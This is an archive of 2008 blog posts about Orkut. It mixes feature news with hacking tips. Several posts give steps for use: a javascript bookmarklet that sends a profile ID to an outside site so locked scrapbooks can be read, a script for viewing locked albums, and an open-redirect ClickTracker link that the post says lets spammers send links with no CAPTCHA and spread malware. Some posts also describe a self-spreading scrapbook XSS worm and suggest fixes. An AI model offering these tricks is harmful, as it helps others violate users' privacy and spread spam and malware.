Friday, February 15, 2008

New Attack on orkut! User gets logged out by just opening scrapbook!

Hackers discovered most serious bug on orkut and that’s too orkut’s most accessed area - scrapbook!

What makes it most serious is that this time user do not need to click or perform any action anywhere to trigger vulnerable codes.

Many users suffered from this. Most of them getting logged out of orkut by just visiting their own scrapbook. Worst they can not delete blank or suspicious scraps either! :-(

The bug is not fixed yet and this can be used by malicious hackers to gain access victims orkut account so details about this bug will be posted after it gets rectified, till then lets use following solution to save yourself!

Objective: Blocking flash content [on orkut atleast] Flashblock

# Firefox User:

Internet Explorer:

  • Go to the Tools Menu -> Internet Options
  • Click on the Security tab
  • Click on Custom Level
  • Disable Run ActiveX controls and plug-ins

image

Additionally delete scraps from your scrapbook if you are getting logged out of orkut on just visiting your own scrapbook!

Thanks Kee Hinckley for timely post on issue!

Related Posts:
Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • IndianPad
  • StumbleUpon
  • Technorati
  • YahooMyWeb
  • Furl
  • Reddit
  • Spurl
Posted by at No comments:

Beginners Guide To OpenSocial & Orkut Sandbox! [covering FAQ]

Many orkut users asked various questions about orkut sandbox to me via scrapbook, comments, community, email & other medium after I published 3 ways to read locked scrapbook on orkut! In this post, I will try to clear your doubts on orkut sandbox and opensocial.

#What is OpenSocial?

From wikipedia,

OpenSocial is a set of common application programming interfaces (APIs) for web-based social network applications, developed by Google, and released November 1, 2007. Applications implementing the OpenSocial APIs will be interoperable with any social network system that supports them, including features on sites such as MySpace and Friendster.

Except facebook almost all social networking sites are using OpenSocial. Means you can safely assume if you write application for orkut using OpenSocial API it will work on other sites (like MySpace, LinkedIn, etc) almost without change! :-)

#What is orkut sandbox?

First lets get relevant definition of sandbox from wikipedia

"The term sandbox is commonly used in the development of Web services to refer to a mirrored production environment for use by external developers. Typically, a third-party developer will develop an create an application that will use a web service from the sandbox, which is used to allow third-party team to validate their code before migrating it to the production environment"

So think of Orkut Sandbox as orkut mirror where you can write application using Open Social API. Its like creating a fake orkut account to test new orkut hack. Think of sandbox as a fake profile with some features added/removed and created by orkut itself for you to test applications!

#Cool… How to signup for orkut sandbox?

By default sandbox access is disabled for a orkut account. You can request access to sandbox using orkut sandbox sign up form. The sandbox access is completely free and will require you to have orkut account beforehand.

After submitting sign-up form you get mail from Google (normally in 2-3 days) indicating status of your request.

#How to access sandbox? Where it is?

Sandbox is extension to your existing orkut account! After receiving confirmation mail from google you can just log on to http://sandbox.orkut.com to enter into sandbox. Also you can modify any orkut pages’ URL to get its view from sandbox.

Example

http://www.orkut.com/scrapbook.aspx?uid=[some_num]

will become..

http://sandbox.orkut.com/scrapbook.aspx?uid=[some_num]

This URL changing resulted in scrapbook hack which enabled people to read locked scrapbook via sandbox!

#Sandbox Limitation

OpenSocial API Calls will operate on sandbox whitelisted friends only. This means to test your applications you need either your friends to gain sandbox access or add people who have access to sandbox as friends. There is an orkut sandbox community where you can find people with sandbox access and add them.

This limitation is enforced for security reasons as explained by Arne Roomann-Kurrik!

Also private information like email addresses of users can not be accessed! So spammers do not think about sandbox as a way for your evil intentions :-)

#Resources

If you are not familiar with words like sandbox, API use following wikipedia links…

Best starting point for developers…

Worth bookmarking….

Finally if you need to communicate…

Let me know if I missed anything! :-)

Related Posts:

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • IndianPad
  • StumbleUpon
  • Technorati
  • YahooMyWeb
  • Furl
  • Reddit
  • Spurl
Posted by at No comments:

Orkut Scrapbook XSS Bug is Still Active!

After two days we posted about scrapbook bug and demonstration of its destructiveness by Rodrigo Lacerda (Portuguese link) and Jerry, it looks like orkut team haven’t got enough of it!

So on request of some of the members and also to force orkut to take this more seriously we are partially revealing the bug…

The bug is in embed tag’s src attribute! Orkut doesn’t validate if src is pointing to valid flash media file URL and thus any URL submitted as value of src attribute just get executed when user opens scrapbook! This is different than most infection where user have to generate some event like clicking on a particular region, link, etc.

Proof of Concept 1:

Here is harmless but highly annoying code which you can put in your friends orkut scrapbook. This is the reason why some people were getting logged out of orkut just by visiting their scrapbook!

Code:

Proof of Concept 2:

More serious but harmless exploitation is a worm created by Rodrigo Lacerda (Portuguese link) which is performing following routine.

  • You read the scrap with code (infact just open the scrapbook with code)
  • Code injects javascript in your browser
  • Javascript code makes you join the community
  • Then code collect your list of friends
  • Send the scrap with the code for them!

The community which is being joined is Infectados pelo VĂ­rus do Orkut! Just check out the community page and reload it. Look how fast the number of members increases. :-)

Solution:

Solution is in the form of flash block extension we talked about in earlier posts!

What should orkut do:

  • They should first activate CAPTCHA (i.e. image verification) for all URLs including their own. That way worm will stop spreading itself!
  • For future they should validate user input properly. XSS is most of the time result of improper validation of input. Like here they haven’t checked URL for filetype!

Update: Orkut in a official blog post claim to fix the bug! But this embed tag’s bug is still open! They might have fixed other bug which Rodrigo used!

Link: Post by Rodrigo Lacerda (in Portuguese ) | Flash Block Solution | Jerry post | Orkut’s official blog post

Related Posts:
Posted by at No comments:

Now You Can Have Your Orkut Profile in Google Search!

Yep. Soon Google crawlers will be indexing orkut profiles and everyone on orkut will be googlable. In simple terms you can use google search to find your friends’ orkut profile and your friends can do same to find you!

Although there is no official post regarding this on any Google or Orkut official blog, a new privacy setting - "orkut in google search results", indicates just this.

Orkut_in_google_search_results

By default this setting is configured to show your orkut information in search results! That’s why you don’t need to do anything to appear in google search.

Those who are concern about privacy can choose "hide information" option. There is no fine grained control like facebook provides. So better opt for hiding if you have doubt on how this feature will be used (or abused).

Three months back facebook opened their user database for search engines and considering facebooks that move this should not surprise anyone.

Also can orkut do this as sensibly as facebook did?

Related: Read how facebook did that!

Related Posts:
Posted by at No comments:

Orkut Viewing Locked Scrapbook Hack is Back!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 3, 2008)

Yep! For those who missed old orkut hack to view locked scrapbook, a new hack to do the same is here!

orkut-unlock-scrapbook

#Steps to use this hack…

  • Navigate to the profile with locked scrapbook or locked scrapbook itself.
  • Now You will see Profile ID in address / navigation bar. Ex. In http://www.orkut.com/Profile.aspx?uid=10226448830416481862 , 10226448830416481862 is Profile ID. Note down this Profile ID.
  • Now replace Profiled in following textbox with Profile ID you have noted above.
  • http://x13.110mb.com/scraps.php?uid=ProfileID
  • So with Profile ID 10226448830416481862, it becomes http://x13.110mb.com/scraps.php?uid=10226448830416481862
  • Finally copy everything from text box and paste it in address bar. Hit ENTER and you will get scraps.

#Alternate way… (Javascript)

  • Navigate to the profile with locked scrapbook or locked scrapbook itself.
  • Paste Following javascript in address bar and hit ENTER.

javascript:var dw = document.location.href; dw = dw.split(’=');document.location=’http://x13.110mb.com/scraps.php?uid=’+dw[1];

#Alternate way… (For Firefox Only)

You can drag-n-drop following bookmarklet on your browsers bookmark toolbar. That will create a bookmark named "UNLOCK SCRAPBOOK". Just click on it whenever you encounter any locked scrapbook and you will be redirected to unlocked scrapbook automatically…

Unlock Scrapbook

Looks like a bad start for orkut in 2008. Thanks Jerry!

Also check out View Photos from Locked Orkut Album!

Related Posts:
Posted by at No comments:

Organize Photos into Album on Orkut - New Feature!

After revising photo upload limits to 100 next thing everyone wanted is a way to manage photos nicely! Orkut answered your call and now you can group your photos into different albums like my vacation album, new year party pics, birthday snaps, …

So when you click photos link now you will see following…

image

Just choose a title and description, your album will be ready. Next you will be taken to screen where you can upload pics into it! Uploading is the same old process. I was expecting a java applet like facebook provides.

Final album will look like this…

image

After creating a album things you can customize anytime are

  • Album cover
  • Name of album i.e. title
  • Album description
  • Of course photos inside album!

One feature orkut should have given is to move photos between album. As of now if you have uploaded lots of photos on orkut on different topics, you can not move them just into different albums. You have to download them first to hard drive, then upload them again different album!

Anyway something nice from orkut after their scrapbook and album hacks!

Related: Official Orkut Blog Post

Related Posts:
Posted by at No comments:

View Locked Orkut Album in Orkut Style!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 17, 2008)

This is highly recommended way of exploiting Orkut album hack to unlock (view) pics in the album!

View_locked_orkut_album

Many users claimed that our old orkut album hack is not working. While we noticed few exception most of the users had trouble in copying and pasting lengthy javascript code. So here comes an automated way - a GreaseMonkey script!

Once you install above script successfully, next time you go to any Orkut locked orkut album, you will see pics from locked orkut album in orkut style alongwith error message which obviously lost its meaning! (See screenshot above)

#How to Install (Need to do this only once!)

Thats it! All locks will be broken automatically as they never existed! :D

#Credits:

Thanks Leandro Koiti Sato for creating this script script. Original script is here. We made a small change in our version to give maximum result to our users!

Thanks Bean for notifying about script! :-)

Related Posts:
Posted by at No comments:

Auto-Confirm Friend Requests on Orkut!

say_yesThis is one of the oldest script I have created and used on Orkut. Just today only I came to know that I never posted about this!

Anyway technically its simplest script I have ever written.

#What it does?

Whenever you add someone to your friend list on orkut or approve any pending friend request, orkut takes you to a confirmation page showing two options!

Case 1: Adding someone to your friend List!

Orkut_Add_friend

Case 2: Accepting a pending friend request!

Orkut_accept_friend

Now all this script does is it clicks on send button in Case 1 and accept button in Case 2! Thus automatically confirming the action positively and redirect you to the next page!

Installation:

OR

Related Scripts:

  • Pending Friend Request Deleter: This scripts deletes all pending friend request in your orkut account! You will need this if you have too many pending friend requests!
Related Posts:
Posted by at No comments:

Bypassing Orkuts Image Verification while Sending Images!

orkut_image_verification

Many users of Scrap All Script had problem sending images with script! Problem is if you have image hosted on third-party server orkut turns on image verification (called CAPTCHA) which script can not bypass!

So here are steps to bypass orkuts image verification while sending images…

  1. Save image on your PC first. (If image is located somewhere else online download it to your PC)
  2. Go to any orkut your scrapbook. There is a button add photo beside button post scrap
  3. Click on add photo button their. That will open a wizard to add photo to scrapbook as shown in screenshot below.
  4. Click Browse button and select image from PC.
  5. Next click Upload Picture button.
  6. When uploading is done you will see a URL in scrapbook text box.
  7. Copy the above URL and paste it in Scrap All scripts text area. The image will be sent without any problem.

orkut_add_photo_to_scrapbook

Also next time while scrapping you can click on link Picasa Web Albums directly as shown in above screenshot to insert images directly from Googles Server. Every image you sent this way is saved online into Picasa Web Albums.

Image verification has gone because your image is hosted on Googles server. Please do not confuse this with breaking of orkut CAPTCHA or breaking of image verification. :-)

Related Link: Scrap All Script - Send a scrap to all orkut friend with one click!

Further Reading...
Posted by at No comments:

Trick to Find All Communities Owned by Any Orkut User!

Yep. Its tricky job to find all communities owned by any orkut users! When you got to any orkut users profile its shows communities joined by that user as well as mutual communities. But there is no direct way of knowing how to find communities owned by orkut users.

So you need to use following trick…

  1. Navigate to any orkut users profile whose communities you want to find
  2. Paste following codes into the address bar and hit enter

javascript:nb=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);window.location.href="http://www.orkut.com/UniversalSearch.aspx?searchFor=C&q="+nb;

Above code will take you to a community search page where you will list of community owned by above user (step 1)

Communities Owned by A Orkut User

Thanks to Arunim and Mr Nobody who discovered this trick. (via Jerry)

Further Reading...
Posted by at No comments:

Orkut Script: One-Click Scrapbook, Album & Add to Friend-List Links!

This script is to ease orkut navigation. It basically adds three hyperlinked letters near every profile link:

  • [S] for Scrapbook Link
  • [A] for Album Link
  • [F] for Add to Friend List Link

Here is the screenshot…

Orkut_Easy_Navigation_links

It may look little bit cluttered but I am using this script from more than a year. Only thing I forgot to post about this on this blog.

Unlike other scripts which opens pop-up containing scrapbook, album and other useful links whenever you right click on any image linking to orkut users profile, this script doesn’t show any popup! Also if you have noticed it takes only one-click to open any users scrapbook, album and friend request page.

Installation:

OR

Helper Script: Auto Confirm friend request - Highly useful with [F] links generated by this script. More details are here.

Further Reading...
Posted by at No comments:

New Orkut Bug Let Spammer Send Any Link Without Image Verification! (Orkut Loves SPAM)

Orkut_Loves_Spam

Not so long back bugs in orkuts privacy features made their users scrapbook & album content accessible to everyone no matter what privacy settings they choose. Orkut team fixed those bug but unfortunately they have to cancel their holiday plan if any as a new bug in Orkut discovered which let spammer send any links without filling up captcha (image verification). All this means more sCrap all spam on orkut!

#proof of concept:

Paste following code in any scrapbook…

http://www.orkut.com/ClickTracker.aspx?url=//////www.devilsworkshop.org

A link will be send which on clicking will take you to this blogs homepage!

Well you may link looks confusing so end user may not click on it…

Ok.. What about following code…

Devils workshop

How many of you looks at browser status bar when clicking link? ;-)

#How to (ab)use!

To send links all you need to do is copy following code and append any URL without http:// to it. (Do not remove any slashes…)

http://www.orkut.com/ClickTracker.aspx?url=//////

#How this bug can be abused?

  • Scrap All Script: Spammers most favorite & most powerful tool against orkut is Scrap All script!
  • To spread Trojan, viruses, spywares, worms, etc: www.devilsworkshop.org can be replace by link to malicious contents

Old orkut user may remember in past spreading of worm via scrapbook was one of the reason orkut came up with captcha (image verification)while sending third-party links! What the use of captcha, if it can be bypassed!

#Bug Details

  • Bug is in ClickTracker.aspx (URL: http://www.orkut.com/ClickTracker.aspx ).

#A simple fix Orkut can do..

Put a if-else block at the beginning of ClickTracker.aspx which checks url parameter for third party domains (i.e. anything else than orkut.com or google.com). If third party domain is found, call captcha routine or just abort the execution.

That’s it! Thanks Jerry for the bug and reporting this in orkut google-group! If you are a google-group user please post reply in this thread so that it gets noticed by orkut team earlier!

Further Reading...
Posted by at No comments:

Orkut Added Community Privacy Feature!

After orkuts privacy features for profile content, now comes turn of orkut communities.

Yes now you can have private communities on orkut where all discussion, polls, events will be secret from non-community members.

The feature can be used by all community owners by going to edit profile community link. Now Edit community page have a new setting - content privacy … (as shown below)

image

If you choose hidden option content from your community will no longer shown to non-members. I guess better approach would have been to hide entire community itself from directory listings as well as orkut search engine.

Finally a note for all dark-minded people… Wait before jumping out of your chair. as orkut can and will monitor content of these secret community! In fact secret communities should be monitored more… ;-)

Related: Hide Orkut Scrapbook from Strangers

Further Reading...
Posted by at No comments:

Orkut Showing Last Login Info to Secure Users!

orkut last login

Orkut started showing information about last login on users orkuts home page!

This is particularly good to save yourself from attackers who steals your login information but instead of deleting or making any changes to your account just monitors your private information. This is more serious threat with email accounts as everything in your mailbox is personal. On orkut still a attacker who have access to your accounts can do following things without getting noticed…

  • Download your contact book
  • Reading orkuts messages
  • Checking private albums/videos
  • Reading profile information (like cell phone numbers) which you may limit to your friends

I do not think many people use orkuts messaging feature. Also last two can be exposed to attackers who if not yours, managed to crack your friends account!

Still this is really good move considering an attacker who is monitoring your account today may get pissed off by you and delete your account. Worse changing your accounts login info and worst spamming your friends with malicious scraps thus causing damage to your social image!

So my advise is to you keep checking this last login info and whenever in doubt about last login time without wasting any more time change your orkut account password!

Related: Orkut Security Tips

Further Reading...
Posted by at No comments:

Orkut Confirming Clicks on Outgoing Links!

Orkut Confirm Click on Outgoing Links

One more security or rather say annoying feature added by orkut is confirming clicks on outgoing links. As shown in above screenshot, if you now click on any link that leads takes you away from orkut, you need to go through confirmation procedure!

With bug in Orkut own Click Tracker program, features like these will end up just annoying Orkut users. Worst user may take this for granted and end up being more vulnerable.

What will happen if a malicious link is sent using a bug like in Orkut very own Click Tracker program? The link will not be categorized as outbound one, so no confirmation box will pop up!

This is where a user will be at risk as she may falsely assume that no confirmation box means no threat! :O

So to orkut team, please stop patch-working like this and do things like more sensibly.

Related: Bug in Orkuts Click Tracker Program

Further Reading...
Posted by at No comments:

Orkuts New Friends Finder - Find Friends From Any Email Account!

Few months back Orkut added a facebook like friends finder. Using that friend finder you could find & invite all your Gmail friends on orkut without much work. We and many other at that time wished orkut should have done that facebook way and made friend finder to work with any email account. Looks like orkut team listened our calls and came up with new improved friends finder.

Orkut New Friends Finder

As shown in screenshot now you can also add friends from Hotmail, Yahoo & AOL!

"find friends" box can be seen in left sidebar on your orkuts home page. If you never used this feature in past then be sure to read orkut friend finder guide!

One more thing, some of my friends haven’t seen this new friend finder on their account yet. I guess like many other feature in past, orkut is rolling this slowly. So it make take a day or two for this feature to get activated on your account! :-)

Authors Note: This is my 100th post on Orkut. Its always a pleasure to write for you. Thanks for your love and support. Hope to receive same in future too! :-)

Further Reading...
Posted by at No comments:
Subscribe to: Comments (Atom)